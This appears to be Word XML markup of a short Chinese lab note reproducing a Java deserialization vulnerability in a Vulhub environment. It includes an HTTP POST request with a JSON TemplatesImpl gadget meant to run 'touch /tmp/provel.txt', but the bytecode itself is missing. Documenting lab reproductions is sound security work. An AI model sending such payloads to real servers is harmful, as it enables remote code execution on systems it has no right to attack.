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817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、Vu</w:t>
      </w:r>
      <w:r>
        <w:t>lhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E8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57800" cy="140462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E88" w:rsidRDefault="00817E88">
                            <w:r w:rsidRPr="00817E88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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
                      <w:r w:rsidRPr="00817E88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7E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:r>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817E88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、使用c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>om.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作为Ga</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，发送如下请求，将会执行t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ouch /tmp/provel.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817E88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2573849" wp14:editId="17173192">
                <wp:extent cx="5251450" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2540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E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                            <w:r w:rsidRPr="00817E88">
                              <w:t>POST /exploit HTTP/1.1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Host: your-ip:8080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Accept-Encoding: gzip, deflate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Accept: */*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Accept-Language: en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User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)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Connection: close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Content-Type: application/json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>Content-Length: 1298</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88"/>
                          <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                            <w:r w:rsidRPr="00817E88">
                              <w:t>{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"param": [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"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",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{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  "transletBytecodes": [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"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"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  ],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  "transletName": "a.b",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  "outputProperties": {}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  }</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                            <w:r w:rsidRPr="00817E88">
                              <w:t xml:space="preserve">  ]</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                            <w:r w:rsidRPr="00817E8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73849" id="_x0000_s1027" type="#_x0000_t202" style="width:4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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>POST /exploit HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Host: your-ip:8080</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Content-Type: application/json</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>Content-Length: 1298</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88"/>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">  "param": [</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">    {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">      "transletBytecodes": [</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">  "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"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">      ],</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">      "transletName": "a.b",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">      "outputProperties": {}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">    }</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E88">
                        <w:t xml:space="preserve">  ]</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88" w:rsidP="00817E88">
                      <w:r w:rsidRPr="00817E8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7E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRDefault="00817E88">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2、查看d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>容器，执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817E88" w:rsidRPr="00817E88" w:rsidRDefault="00817E88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0F1B632" wp14:editId="46E09004">
            <wp:extent cx="5274310" cy="60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E88" w:rsidRPr="0081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59" w:rsidRDefault="00014F59" w:rsidP="00817E88">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00014F59" w:rsidRDefault="00014F59" w:rsidP="0081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59" w:rsidRDefault="00014F59" w:rsidP="00817E88">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00014F59" w:rsidRDefault="00014F59" w:rsidP="0081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F3"/>
    <w:rsid w:val="00014F59"/>
    <w:rsid w:val="004905F3"/>
    <w:rsid w:val="00817E88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05BF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1ECD616C-5D8D-410F-A26C-F764D945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2022-05-26T11:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T11:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>